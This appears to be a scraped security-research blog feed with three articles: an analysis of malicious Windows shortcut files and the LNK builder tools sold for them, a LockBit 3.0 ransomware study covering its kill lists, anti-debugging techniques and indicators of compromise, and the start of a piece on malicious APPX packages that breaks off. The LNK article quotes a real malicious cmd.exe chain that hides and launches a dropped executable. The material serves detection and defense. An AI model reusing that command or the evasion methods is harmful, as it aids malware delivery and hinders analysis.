🔒
There are new articles available, click to refresh the page.
✇SentinelLabs

Who Needs Macros? | Threat Actors Pivot to Abusing Explorer and Other LOLBins via Windows Shortcuts 

By: Aleksandar Milenkoski

By Aleksandar Milenkoski & Jim Walter

Executive Summary

  • Windows Explorer (explorer.exe) is the top initial living-off-the-land binary (LOLbin) in the chain of LOLbins that threat actors abuse to execute malware through malicious Windows shortcuts (LNK files).
  • Our mass-analysis of 27510 representative malicious LNK files from VirusTotal revealed Windows Explorer at the top of the list (with 87.2% prevalence), followed by powershell.exe(7.3%), wscript.exe(4.4%), and rundll32.exe(0.5%). LNK files are currently immensely popular among threat actors for malware deployment and persistence.
  • We have observed intensive advertising of new versions of the mLNK and QuantumBuilder tools for building malicious LNK files in the cybercrime web space since May 2022, with many new features for evasion and stealth.
  • The mLNK and QuantumBuilder tools enable threat actors to build malicious LNK files in a configurable and convenient manner. Given the popularity of LNK files among threat actors, there is an increasing demand for such tools on the cybercrime market.
  • The actors behind the QuantumBuilder tool for building malicious LNK files advertise the tool and the value of LNK files to threat actors by claiming that Office macros “are for the most part dead” [as a medium for deploying malware], referring to Microsoft’s recent decision to disable by default Office macro execution in the context of documents that originate from untrusted sources.

Overview

This article discusses Windows shortcuts (LNK files) as a medium to deploy malware and/or establish persistence. In the initial stages of an attack, threat actors are gravitating more towards the use of malicious shortcuts that deploy malware by executing code in the context of so-called living-off-the-land binaries (LOLbins) – legitimate executables that are readily available on Windows systems, such as powershell.exeor mshta.exe – to bypass detection. Threat actors conveniently build malicious LNK files with Windows system capabilities or tools specifically designed for that purpose, and then distribute the files to victims, usually through phishing emails.

Because of these advantages, threat actors are widely abusing shortcuts. Since Microsoft’s announcement that Office applications will by default disable the execution of Office macros in the context of documents that originate from untrusted sources, there has been a significant uptick in malicious actors using alternative mediums for deploying malware, such as malicious Windows Apps and shortcuts (LNK files). We covered malicious Windows Apps in a previous article. In this article, we focus on malicious shortcuts and provide:

  • Insights about execution chains that originate from malicious shortcuts. We base our insights on an analysis of 27510 malicious LNK file samples from VirusTotal that are representative of the current malicious shortcut landscape.
  • An overview of active widespread attack campaigns that involve malicious shortcuts and of the dynamics of the cybercrime market for tools that build malicious LNK files.
  • A summarizing overview of the system activities that take place when a user executes a malicious shortcut. This enables a better and generic understanding of what occurs on a system when a user falls prey to an attack that involves a malicious LNK file.

Current Developments in the Malicious Shortcut Threat Scene

Given the popularity of LNK files among threat actors, the dynamics of the cybercrime market for tools has quickly adjusted to serve the demand for tools that build malicious LNK files in a configurable and convenient manner. We spotlight in this section the mLNK and QuantumBuilder tools for building malicious LNK files. We observed that these tools have recently received updates and are currently being intensively advertised in the cybercrime web space.

mLNK

The mLNK tool – released by NativeOne, a tool vendor on the cybercrime scene – is known for its configurability and ease of use. NativeOne released the newest version of the tool, version 4.2, in June 2022. We observed an intensive advertising campaign for the new mLNK version on cybercrime forums and market places.

The NativeOne ‘exploit website’
The NativeOne ‘exploit website’

The new mLNK version brings new features that enable building LNK files that can evade Windows detection mechanisms, such as Microsoft Defender SmartScreen. The public release of mLNK currently sells for a basic price of $100 per month. NativeOne also sells a private release of mLNK 4.2 for $125.00, which bundles more evasion mechanisms than the $25.00 cheaper public release of the tool.

Purchase page of mLNK
Purchase page of mLNK
Advertising page of mLNK 4.2 features
Advertising page of mLNK 4.2 features

QuantumBuilder

Similar to mLNK, the QuantumBuilder tool is configurable and easy to use, enabling threat actors to conveniently create malicious LNK files. In May 2022, we started observing an advertising campaign for a new QuantumBuilder version in the cybercrime web space, consistent with other reports.

The QuantumBuilder’s window for building a malicious shortcut
The QuantumBuilder’s window for building a malicious shortcut

The actors behind the QuantumBuilder tool distinguish between public, VIP, and private users, and sell the tool for a basic price of €189. The following figure depicts the price list of QuantumBuilder as advertised online, including the advantages of becoming a VIP or private QuantumBuilder user.

The price list of QuantumBuilder
QuantumBuilder price list

It is interesting to note that the actors behind QuantumBuilder advertise the tool by claiming that Office macros as a medium for deploying malware “are for the most part dead”, referring to Microsoft’s decision to disable by default Office macro execution in the context of documents that originate from untrusted sources.

Advertisement of QuantumBuilder
QuantumBuilder advertisement

Active Attack Campaigns Leveraging Shortcuts

A number of widespread attack campaigns that involve malicious shortcuts are active at the time of writing this article:

  • Threat actors have started intensively distributing the major malware families QBot, Emotet, IcedID, and Bumblebee through LNK files since the second quarter of 2022. These malware families are capable of deploying additional malware on compromised systems, including destructive ransomware. In addition, the Threat Analysis Group (TAG) at Google has observed Exotic Lily, an initial access broker (IAB) for ransomware actors, distributing malicious LNK files to infect systems.
  • Threat actors have been massively deploying the Raspberry Robin worm on systems through malicious LNK files since September 2021. These attacks specifically involve infected USB media, containing malicious LNK files.
  • There are several Ukraine-themed attack campaigns as well as attack campaigns specifically targeting Ukrainian systems that are active since the second quarter of 2022. The Armageddon threat group, which the Security Service of Ukraine identifies as a unit of the Federal Security Service of the Russian Federation, has been distributing malicious LNK files through targeted phishing emails. The malicious LNK files deploy the GammaLoad.PS1_v2 malware on compromised systems. There are also other Ukraine-themed malicious LNK files currently in circulation. In addition, the GlowSand attack campaign includes malicious LNK files that download payloads from attacker-controlled endpoints that respond only to requests from systems with Ukrainian IP addresses.

How Threat Actors Are Abusing Shortcuts

In this section, we characterize malicious shortcuts by analyzing the filesystem path to the shortcut target and the command line arguments that the system specifies at shortcut target activation. We take a snapshot of the current malicious shortcut landscape based on VirusTotal as a mass repository of representative malicious LNK file samples. We analyzed 27510 LNK file samples submitted to VirusTotal between July 14th, 2021 and July 14th, 2022. All samples were considered malicious by at least 30 vendors. 68.89% of the LNK file samples were submitted in 2022, and the remaining 31.11% in 2021.

We provide current insights about execution chains that originate from malicious shortcuts to assist threat detection and hunting efforts. The section How Does Windows Execute Shortcuts? below provides background information on Windows shortcuts and the system activities that take place when a user executes a shortcut.

The following image depicts the targets of the malicious shortcuts we analyzed – the executables that the shortcuts execute at target activation – and their prevalence in the set of malicious shortcuts (expressed in percentages, rounded to three decimal places).

Targets of malicious shortcuts
Targets of malicious shortcuts

The shortcut targets are LOLbins and/or enable the execution of attacker-specified code and/or executables. We observed the following targets at the top of the list:

  • cmd.exe, the Windows command interpreter, which enables the execution of Windows commands and arbitrary executables.
  • rundll32.exe, which enables the execution of arbitrary code in a Windows DLL.
  • wscript.exe, a Windows script execution environment, which enables the execution of arbitrary script code.
  • powershell.exe, the command interpreter of the PowerShell scripting engine.

Malicious shortcuts activate cmd.exe as the shortcut target to execute one or multiple Windows commands (typically implemented as executables that reside in the %SystemRoot%\System32 folder), and/or attacker-provided files:

  • Files with the filename extension .exe (.exe files) and of Windows executable file format.
  • Files with filename extensions different from .exe (non-.exe files) and of any file format, including the Windows executable format.

Malicious shortcuts execute multiple Windows commands and/or attacker-provided files through cmd.exe by specifying them as part of command statements that are chained with the & symbol. The chained command statements are part of the command line arguments of the shortcut target cmd.exe.

The malicious shortcuts we analyzed execute a variety of Windows commands through cmd.exe.

The Windows commands executed through cmd.exe and their prevalence
The Windows commands executed through cmd.exe and their prevalence

We categorize the commands as follows:

  • Commands for command execution flow control, such as exit, goto, and for.
  • Commands for file manipulation, such as xcopy, attrib, and copy.
  • Commands that enable the execution of attacker-specified code and/or executables – LOLbins, such as explorer, powershell, wscript, rundll32, msiexec, start, and regsvr32.

    The prevalence of LOLbins in the set of the malicious shortcuts we analyzed
    The prevalence of LOLbins in the set of the malicious shortcuts

  • Commands for information gathering, reconnaissance, and system configuration, such as findstr, set, ping, and net.
  • Commands for messaging and controlling the command interpreter output, such as cls, msg, echo, and rem.

The majority of the filenames of the attacker-provided .exe files that the malicious shortcuts we analyzed execute through cmd.exe are random – 99.914% of the filenames are random and only 0.086% are non-random (comprehensible), such as streamer.exe, setup.exe, or windowsupdater.exe.

We grouped the malicious shortcuts that execute attacker-provided .exe files through cmd.exe into clusters according to the filenames of the .exe files. We observed that the .exe files with non-random filenames are executed by a small number of shortcut clusters with large population sizes, with an average of 1177 shortcuts. On the contrary, the .exe files with random filenames are executed by a large number of shortcut clusters with very small population sizes, the majority of which with no more than 3 shortcuts. This shows that defenders should consider highly suspicious shortcuts that execute .exe files with random filenames, while staying on top of .exe file naming trends in the threat landscape for better detection coverage.

Number of malicious shortcut clusters vs. shortcut cluster population sizes
Number of malicious shortcut clusters vs. shortcut cluster population sizes

We observed a very diverse set of 253 different filename extensions of the attacker-provided non-.exe files that the malicious shortcuts we analyzed execute through cmd.exe.

The top 40 filename extensions of the attacker-provided non-.exe files the malicious shortcuts we analyzed execute through cmd.exe and the extensions’ prevalence
The top 40 extensions the malicious shortcuts execute through cmd.exe and their prevalence

Considering filename extensions only, the malicious shortcuts executed:

  • Script files, such as files with the filename extensions .vbs, .vbe, and .js;
  • Executable files, such as files with the filename extensions .scr and .dll;
  • Data files – files that store textual, audio, video, archive, and/or other arbitrary content, such as files with the filename extensions .docx, .png., .log., and .dat.

We observed that the filename extensions of the vast majority of the apparent data files, such as .docx or .avi, spoof filename extensions of executable or script files, such as .exe or .vbs, to masquerade executable or script files as files of other formats.

For approximately 0.5% of the malicious shortcuts we analyzed, the combined length of the filesystem path to the shortcut target and the command line arguments that the system specifies at target activation is greater than 260 characters. Visual inspection of the Properties > Shortcut > Target field of an LNK file in the Explorer utility, which displays the path to the shortcut target and any command line arguments, does not reveal anything beyond 260 characters. Attackers are known to abuse this for obfuscation – they craft LNK files such that command line arguments are padded with characters, such as newline or space, so that the combined length of the path to the shortcut target and the command line arguments significantly exceeds 260 characters.

We observed character padding mostly in shortcuts that targeted powershell.exe. In addition, we observed string concatenation and the use of the caret (^) symbol for target and/or command line argument obfuscation in approximately 2.5% of the samples.

How Does Windows Execute Shortcuts?

The user interface of the Windows operating system, a component referred to as the Windows Shell, manages and conceptually represents as objects entities that users interact with. Objects include entities that reside on the filesystem, such as files and folders, as well as other entities, such as networked computers. The Windows Shell structures these objects into a namespace – the Shell namespace.

When a user creates a shortcut to another object (also referred to as the shortcut target) using the Create shortcut command, the Windows Shell creates a Shell Link object and an LNK file – a file with the .lnk filename extension. An LNK file is in the binary Shell Link file format and stores information that Windows needs to access (activate) the shortcut target in data structures. This information includes:

  • The filesystem path to the shortcut target, for example, the path relative to the location of the LNK file (in the RELATIVE_PATH structure) and the absolute path (in the LinkTargetIDList structure).
  • The parameters (command line arguments) that the system specifies at shortcut target activation (in the COMMAND_LINE_ARGUMENTS structure).
  • The filesystem path to the shortcut icon that the system displays for the LNK file in icon view (in the ICON_LOCATION structure).

The figure below depicts the content of the malicious LNK file that we named malLNK.lnk (SHA-1 hash value: 5b241d50f1a662d69c96d824d7567d4503379c37). We displayed the content of malLNK.lnk using the LECmd LNK file parsing tool.

The content of malLNK.lnk (trimmed for brevity; the ? replaces Unicode characters)

The shortcut target of malLNK.lnk is C:\Windows\System32\cmd.exe and the command line argument is:

/c "%SystemRoot%\explorer.exe %cd%新建文件夹 & attrib -s -h %cd%qCAQlUf.exe & xcopy /F /S /Q /H /R /Y %cd%qCAQlUf.exe %temp%\rplKl\ & attrib +s +h %cd%qCAQlUf.exe & start %temp%\rplKl\qCAQlUf.exe & exit"

In summary, the activated shortcut target uses the Explorer utility to execute an executable, manipulates the System and Hidden attributes of executables, copies an executable, and executes the copied executable.

The following figure depicts a simplified overview of the activities that the Windows operating system conducts to activate a shortcut target through an LNK file. We take malLNK.lnk as a running example.

Overview of system activities at shortcut target activation. The numbers label the transitions between the activities.

Windows handles shortcut target activation using implementations of the IContextMenu::InvokeCommand Windows Shell method. This function takes a single parameter of type CMINVOKECOMMANDINFO or CMINVOKECOMMANDINFOEX. The CMINVOKECOMMANDINFO(EX) data structure stores information about the command that the Windows Shell executes when a user triggers the execution of IContextMenu::InvokeCommand. In the context of shortcuts, the command is the shortcut target with any command line arguments.

The information that CMINVOKECOMMANDINFO(EX) stores includes the working directory at command execution (the lpDirectory(W) structure fields) and command parameters (the lpParameters(W) structure fields). In contrast to CMINVOKECOMMANDINFO,CMINVOKECOMMANDINFOEX allows for Unicode structure field values.

When a user double-clicks malLNK.lnk (label [1]), the system executes the CDefFolderMenu::InvokeCommand function (label [2]). CDefFolderMenu::InvokeCommand is implemented in the %SystemRoot%\System32\shell32.dll. This function populates a CMINVOKECOMMANDINFOEX structure and passes the execution flow to the CShellLink::InvokeCommand function with the populated CMINVOKECOMMANDINFOEX structure as the function’s parameter.

CShellLink::InvokeCommand is implemented in %SystemRoot%\System32\windows.storage.dll (label [3]). The CMINVOKECOMMANDINFOEX data structure that the CShellLink::InvokeCommand function takes as its parameter has only a few fields populated, for example, the mandatory cbSize field (specifies the size ofCMINVOKECOMMANDINFOEX in bytes) and lpDirectory(W).

The figure below depicts the content of the CMINVOKECOMMANDINFOEX structure that CShellLink::InvokeCommand takes as its parameter. malLNK.lnk resides in the C:\Users\<user>\Desktop\malLNK folder – this determines the values of the lpDirectory(W) fields.

The content of the CMINVOKECOMMANDINFOEX structure before the CShellLink::InvokeCommand function executes

The CShellLink::InvokeCommand function conducts the central activities related to shortcut handling. This includes locating the shortcut target on the filesystem, expanding environment variables, and fully populating a CMINVOKECOMMANDINFOEX structure (label [4]). CShellLink::InvokeCommand passes the execution flow back to the CDefFolderMenu::InvokeCommand function with a fully populated CMINVOKECOMMANDINFOEX structure (label [5]). For example, the populated CMINVOKECOMMANDINFOEX structure stores the command parameter in the lpParameters(W) structure fields – this is the data in the COMMAND_LINE_ARGUMENTS structure that resides in malLNK.lnk.

The content of CMINVOKECOMMANDINFOEX structure after the CShellLink::InvokeCommand function executes

The CDefFolderMenu::InvokeCommand function then passes the execution flow to the CRegistryVerbsContextMenu::InvokeCommand function with the fully populated CMINVOKECOMMANDINFOEX structure as the function’s parameter (label [6]). CRegistryVerbsContextMenu::InvokeCommand is implemented in the shell32.dll DLL.

The invocation of CRegistryVerbsContextMenu::InvokeCommand leads to the creation of a new process by invoking the CreateProcessW function that is implemented in %SystemRoot%\System32\kernel32.dll (label [7]). The command line of this process is the shortcut target and the command line argument, as shown below.

C:\windows\system32\cmd.exe /c "%SystemRoot%\explorer.exe %cd%新建文件夹 & attrib -s -h %cd%qCAQlUf.exe & xcopy /F /S /Q /H /R /Y %cd%qCAQlUf.exe %temp%\rplKl\ & attrib +s +h %cd%qCAQlUf.exe & start %temp%\rplKl\qCAQlUf.exe & exit"
The command line of the newly created process at shortcut target activation
The command line of the newly created process at shortcut target activation

Recommendations for Investigators and Users

Investigators should consider highly suspicious any Windows shortcut (LNK file) that exhibits the following in the execution chain that originates from the shortcut:

  • Execution of executables (including activation of shortcut targets) that are LOLbins and/or enable the execution of attacker-specified code and/or executables. We observed the following such executables to be among the most prevalent in the set of malicious shortcuts we analyzed: explorer.exe, powershell.exe, and wscript.exe.
  • Execution of files with a filename extension different from .exe (non-.exe files) through cmd.exe as the shortcut target. We observed 253 different extensions of the non-.exe files that the malicious shortcuts we analyzed execute. The majority of these non-.exe files are files that store executable code (for example, Windows executables or script files) masquerading as files of other formats, such as audio or video files.
  • Execution of files with the .exe extension and random filenames through cmd.exe as the shortcut target. For .exe files with non-random (comprehensible) filenames, investigators should stay on top of .exe file naming trends in the threat landscape for better detection coverage.

Users should stay vigilant against phishing attacks and refrain from executing attached files that originate from unknown sources. Threat actors are distributing malicious LNK files through phishing emails at a mass scale and there is a substantial number of active widespread attack campaigns that involve malicious shortcuts. The malicious LNK files often come with misleading filenames and icons masquerading as important documents or critical software to lure users into activating the shortcuts.

✇SentinelLabs

LockBit 3.0 Update | Unpicking the Ransomware’s Latest Anti-Analysis and Evasion Techniques

By: Jim Walter

By Jim Walter & Aleksandar Milenkoski

LockBit 3.0 ransomware (aka LockBit Black) is an evolution of the prolific LockBit ransomware-as-a-service (RaaS) family, which has roots that extend back to BlackMatter and related entities. After critical bugs were discovered in LockBit 2.0 in March 2022, the authors began work on updating their encryption routines and adding several new features designed to thwart researchers. In June 2022, LockBit 3 caught the interest of the media as the ransomware operators announced they were offering a ‘bug bounty’ to researchers. In this post, we provide an overview of the LockBit 3.0 ransomware update and offer a technical dive for researchers into LockBit 3.0’s anti-analysis and evasion features.

LockBit 3.0 Changes and New Features Since LockBit 2.0

Around June of 2022, operators and affiliates behind LockBit ransomware began the shift to LockBit 3.0. Adoption of LockBit 3.0 by affiliates has been rapid, and numerous victims have been identified on the new “Version 3.0” leak sites, a collection of public blogs naming non-compliant victims and leaking extracted data.

LockBit 3 ransomware leaks site
LockBit 3 ransomware leaks site

In order to improve resilience, the operators have been aggressive with regards to standing up multiple mirrors for their leaked data and publicizing the site URLs.

LockBit has also added an instant search tool to their leaks site.

Updated LockBit leak site with new Search feature
Updated LockBit leak site with new Search feature

The authors of LockBit 3.0 have introduced new management features for affiliates and added Zcash for victim payments in addition to Monero and Bitcoin.

The ransomware authors also claim to have opened a public “bug bounty” program. Ostensibly, this appears to be an effort to improve the quality of the malware, and financially reward those that assist.

Lockbit ransomware group announced today Lockbit 3.0 is officially released with the message: "Make Ransomware Great Again!"

Additionally, Lockbit has launched their own Bug Bounty program paying for PII on high-profile individuals, web security exploits, and more… pic.twitter.com/ByNFdWe4Ys

— vx-underground (@vxunderground) June 26, 2022

On top of that, there is a purported $1 million reward on offer to anyone who can uncover the identity of the program affiliate manager. Understandably, given the criminal nature of the operators, would-be researchers may find that reporting bugs to a crimeware outfit may not lead to the promised payout but could lead to criminal charges from law enforcement.

LockBit 3.0 Payloads and Encryption

The updated LockBit payloads retain all the prior functionality of LockBit 2.0.

Initial delivery of the LockBit ransomware payloads is typically handled via 3rd party frameworks such as Cobalt Strike. As with LockBit 2.0, we have seen infections occur down the chain from other malware components as well, such as a SocGholish infection dropping Cobalt Strike, which in turn delivers the LockBit 3 ransomware.

The payloads themselves are standard Windows PE files with strong similarities to prior generations of LockBit as well as BlackMatter ransomware families.

PEStudio view of LockBit 3.0 Payload
PEStudio view of LockBit 3.0 Payload

LockBit ransomware payloads are designed to execute with administrative privileges. In the event that the malware does not have the necessary privileges, a UAC bypass will be attempted (CMSTP).

LockBit 3.0 achieves persistence via installation of System Services. Each execution of the payload will install multiple services. We have observed the following service names in conjunction with LockBit 3.0 ransomware payloads.

SecurityHealthService
Sense
sppsvc
WdBoot
WdFilter
WdNisDrv
WdNisSvc
WinDefend
wscsvc
vmicvss
vmvss
VSS
EventLog

As with previous versions, LockBit 3.0 will attempt to identify and terminate specific services if found. The following service names are targeted for termination in analyzed LockBit 3.0 samples:

backup
GxBlr
GxCIMgr
GxCVD
GxFWD
GxVss
memtas
mepocs
msexchange
sophos
sql
svc$
veeam
vss

In addition, the following processes are targeted for termination:

agntsvc
dbeng50
dbsnmp
encsvc
excel
firefox
infopath
isqlplussvc
msaccess
mspub
mydesktopqos
mydesktopservice
notepad
ocautoupds
ocomm
ocssd
onenote
oracle
outlook
powerpnt
registry
sqbcoreservice
steam
synctime
tbirdconfig
thebat
thunderbird
visio
winword
wordpad
xfssvccon

LockBit 3.0 writes a copy of itself to the %programdata% directory, and subsequently launches from this process.

The encryption phase is extremely rapid, even when spreading to adjacent hosts. The ransomware payloads were able to fully encrypt our test host in well under a minute.

On execution, the LockBit 3.0 ransomware will drop newly-formatted ransom notes along with a change to the desktop background. Interestingly, notepad and wordpad are included in the list of prescribed processes as noted above. Therefore, if a victim attempts to open the ransom note immediately after it is dropped, it will promptly close since the process is blocked until the ransomware completes its execution.

The new LockBit 3.0 ransomware desktop wallpaper is a simple text message on a black background.

LockBit 3.0 Desktop Wallpaper
LockBit 3.0 Desktop Wallpaper

The extension appended to newly encrypted files will also differ per campaign or sample.  For example, we have seen “HLJkNskOq” and “futRjC7nx”. Both encrypted files and the ransom notes will be prepended with the campaign-specific string.

futRjC7nx.README
HLJkNskOq.README

During our analysis, we observed infected machines shutting down ungracefully approximately 10 minutes after the ransomware payload was launched. This behavior may vary per sample, but it is worth noting.

Post-infection, LockBit 3.0 victims are instructed to make contact with their attacker via their TOR-based “support” portal.

LockBit 3.0 Ransom Note Excerpt
LockBit 3.0 Ransom Note Excerpt

LockBit 3 Anti-Analysis & Evasion

The LockBit 3.0 ransomware uses a variety of anti-analysis techniques to hinder static and dynamic analysis, and exhibits similarities to the BlackMatter ransomware in this regard. These techniques include code packing, obfuscation and dynamic resolution of function addresses, function trampolines, and anti-debugging techniques. In this section, we cover some of the anti-analysis techniques that LockBit 3.0 uses.

LockBit 3.0 payloads require a specific passphrase to execute. The passphrase is unique to each sample or campaign and serves to hinder dynamic and sandbox analysis if the passphrase has not been recovered along with the sample. A similar technique has been used by Egregor and BlackCat ransomware. The passphrase is provided upon execution via the -pass parameter. For example,

lockbit.exe -pass XX66023ab2zyxb9957fb01de50cdfb6

Encrypted content located in the LockBit 3.0 payload is decrypted at runtime using an XOR mask. The images below show the content of the ransomware’s .text executable segment before (label 1) and after (label 2) the ransomware has decrypted the segment content. The .text segment starts at the virtual address 0x401000.


The content of the ransomware’s .text executable segment
The content of the ransomware’s .text executable segment

LockBit 3.0 also first stores in heap memory and then uses trampolines for executing functions, for example, the Windows system calls NtSetInformationThread and ZwProtectVirtualMemory. The ransomware obfuscates the function addresses that the trampolines execute using the XOR and/or bit rotation obfuscation technique.

Some of the function trampolines LockBit 3.0 implements
Some of the function trampolines LockBit 3.0 implements

Several techniques are implemented for detecting the presence of a debugger and hindering dynamic analysis. For example, the ransomware evaluates whether heap memory parameters that indicate the presence of a debugger are set. Such flags are HEAP_TAIL_CHECKING_ENABLED (0x20) and HEAP_VALIDATE_PARAMETERS_ENABLED (0x40000000).

LockBit 3.0 examines the ForceFlags value in its PEB (Process Environment Block) to evaluate whether HEAP_VALIDATE_PARAMETERS_ENABLED is set.

LockBit 3.0 evaluates whether HEAP_VALIDATE_PARAMETERS_ENABLED is set
LockBit 3.0 evaluates whether HEAP_VALIDATE_PARAMETERS_ENABLED is set

The ransomware also evaluates whether the 0xABABABAB byte signature is present at the end of heap memory blocks that it has previously allocated. The presence of this byte signature means that HEAP_TAIL_CHECKING_ENABLED is set.

LockBit 3.0 evaluates whether HEAP_TAIL_CHECKING_ENABLED is set
LockBit 3.0 evaluates whether HEAP_TAIL_CHECKING_ENABLED is set

The LockBit 3.0 ransomware executes the NtSetInformationThread function through a trampoline, such that the ThreadHandle and ThreadInformationClass function parameters have the values of 0xFFFFFFFE and 0x11 (ThreadHideFromDebugger). This stops the flow of events from the current ransomware’s thread to an attached debugger, which effectively hides the thread from the debugger and hinders dynamic analysis.

LockBit 3.0 executes <em>NtSetInformationThread</em>
LockBit 3.0 executes NtSetInformationThread

In addition, LockBit scrambles the implementation of the DbgUiRemoteBreakin function to disable debuggers trying to attach to the ransomware process. When it executes, LockBit 3.0 ransomware:

  • Resolves the address of DbgUiRemoteBreakin.
  • Executes the ZwProtectVirtualMemory function through a trampoline to apply the PAGE_EXECUTE_READWRITE (0x40) protection to the first 32 bytes of the memory region where the implementation of DbgUiRemoteBreakin resides. This makes the bytes writable.
  • Executes the SystemFunction040 (RtlEncryptMemory) function through a trampoline to encrypt the bytes that the ransomware has previously made writable. This scrambles the implementation of the DbgUiRemoteBreakin function and disables debuggers to attach to the ransomware process.
  • LockBit 3.0 modifies the implementation of the DbgUiRemoteBreakin function
    LockBit 3.0 modifies the implementation of the DbgUiRemoteBreakin function

The images below depict the implementation of the DbgUiRemoteBreakin function before (label 1) and after (label 2) the LockBit 3.0 ransomware has modified the implementation of the function.


The implementation of the DbgUiRemoteBreakin function

Conclusion

LockBit has fast become one of the more prolific ransomware-as-a-service operators out there, taking over from Conti after the latter’s fractious fallout in the wake of the Russian invasion of Ukraine.

LockBit’s developers have shown that they are quick to respond to problems in the product they are offering and that they have the technical know-how to keep evolving. The recent claim to be offering a ‘bug bounty’, whatever its true merits, displays a savvy understanding of their own audience and the media landscape that surrounds the present tide of crimeware and enterprise breaches.

Short of intervention by law enforcement, we expect to see LockBit around for the forseeable future and further iterations of what is undoubtedly a very successful RaaS operation. As with all ransomware, prevention is better than cure, and defenders are encouraged to ensure that they have comprehensive ransomware protection in place. SentinelLabs will continue to offer updates and reports on LockBit activity as it develops.

Indicators of Compromise

SHA256
f9b9d45339db9164a3861bf61758b7f41e6bcfb5bc93404e296e2918e52ccc10
a56b41a6023f828cccaaef470874571d169fdb8f683a75edd430fbd31a2c3f6e
d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee

SHA1
ced1c9fabfe7e187dd809e77c9ca28ea2e165fa8
371353e9564c58ae4722a03205ac84ab34383d8c
c2a321b6078acfab582a195c3eaf3fe05e095ce0

.ONION domains
lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead[.]onion
lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd[.]onion
lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd[.]onion
lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd[.]onion
lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd[.]onion
lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd[.]onion
lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid[.]onion
lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd[.]onion
lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd[.]onion
lockbit7z2jwcskxpbokpemdxmltipntwlkmidcll2qirbu7ykg46eyd[.]onion
lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd[.]onion
lockbitsupdwon76nzykzblcplixwts4n4zoecugz2bxabtapqvmzqqd[.]onion
lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd[.]onion
lockbitsupo7vv5vcl3jxpsdviopwvasljqcstym6efhh6oze7c6xjad[.]onion
lockbitsupq3g62dni2f36snrdb4n5qzqvovbtkt5xffw3draxk6gwqd[.]onion
lockbitsupqfyacidr6upt6nhhyipujvaablubuevxj6xy3frthvr3yd[.]onion
lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd[.]onion
lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd[.]onion
lockbitsupxcjntihbmat4rrh7ktowips2qzywh6zer5r3xafhviyhqd[.]onion

MITRE ATT&CK
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1543.003 – Create or Modify System Process: Windows Service
T1055 – Process Injection
T1070.001 – Indicator Removal on Host: Clear Windows Event Logs
T1622 – Debugger Evasion
T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
T1485 – Data Destruction
T1489 – Service Stop
T1490 – Inhibit System Recovery
T1003.001 – OS Credential Dumping: LSASS Memory
T1078.002 – Valid Accounts: Domain Accounts
T1078.001 – Valid Accounts: Default Accounts
T1406.002 – Obfuscated Files or Information: Software Packing
T1218.003 – System Binary Proxy Execution: CMSTP
T1047 – Windows Management Instrumentation
T1119 – Automated Collection

✇SentinelLabs

Inside Malicious Windows Apps for Malware Deployment

By: Aleksandar Milenkoski

This article discusses Windows Apps – Windows applications packaged into APPX or MSIX packages  – as a medium to deploy malware. Though not as widely abused as other infection vectors, there have been a number of recent high profile attacks that use Windows Apps.

  • November, 2021: BazarBackdoor was distributed in the form of an APPX package.
  • December, 2021: Emotet malware was distributed by abusing a spoofing vulnerability in the Windows App Installer, software that installs Windows Apps.
  • January, 2022:  Malicious Windows Apps in APPX format masquerading as critical browser updates were used to drop Magniber ransomware.
  • February, 2022: Windows Apps laced with the Electron Bot malware were uploaded to the Microsoft Store, a trusted library of Microsoft-certified packaged Windows Apps.

Since Microsoft’s announcement that Office applications will by default disable the execution of Office macros in the context of documents that originate from untrusted sources, there has been an uptick in malicious actors using alternative mediums for deploying malware such as Windows Apps and Windows shortcut LNK files. Despite Microsoft recently rolling back the decision to disable by default Office macro execution, these media complement malicious macros and remain a threat to watch for.

Previous research on malicious Windows Apps focused on concrete system infections involving particular instances of such Apps. This article complements previous research by taking a generic perspective. I take an APPX package that malicious actors have used to deploy malware as a running example and provide:

  • A summarizing overview of the layout and content of APPX packages (APPX packages are structurally very similar to the alternative MSIX packages and the two Windows App packaging formats share the same deployment infrastructure).
  • An overview of selected activities that the Windows system conducts when a user installs a malicious APPX package.

This enables a better understanding of what occurs on a system when a user falls prey to an attack that involves a malicious Windows App – from the operating system activities at first user interaction with the file to the malware deployment that the file triggers.

For Windows to install an APPX package, whether malicious or not, the system first has to establish trust in the package. Microsoft provides the Microsoft Store to Windows users as a library of certified packaged Windows Apps. These packages are digitally counter-signed by Microsoft. Windows trusts by default APPX packages that originate from the Windows Store. However, when the Windows App sideloading feature is enabled, users can install APPX packages that do not originate from the Microsoft Store as well, that is, packages that are not counter-signed by Microsoft. Such are the majority of the malicious APPX packages that the security community has observed in attacks.

In this article, we will dig into how malicious APPX packages can be installed on a Windows 10 system, with a focus on how Windows establishes trust in an APPX package. I focus on this aspect since trust is a crucial part of the Windows App installation process. This process is what ultimately deploys malware on a system. I will use the malicious APPX package edge_update.appx (SHA1: e491af786b5ee3c57920b79460da351ccf8f6f6b) as a running example.

What Does a Malicious Windows App Look Like?

The edge_update.appx APPX package is signed with a code signing certificate issued to Foresee Consulting Inc. and a root certificate issued by DigiCert Trusted Root G4. Windows systems trust DigiCert root certificates and they are placed in the Trusted Root Certification Authorities certificate store.

Figure 1 depicts the certificate chain of the digital signature of edge_update.appx before a Certificate Authority revoked the certificate.

Figure 1: The certificate chain of the digital signature of edge_update.appx prior certificate revocation

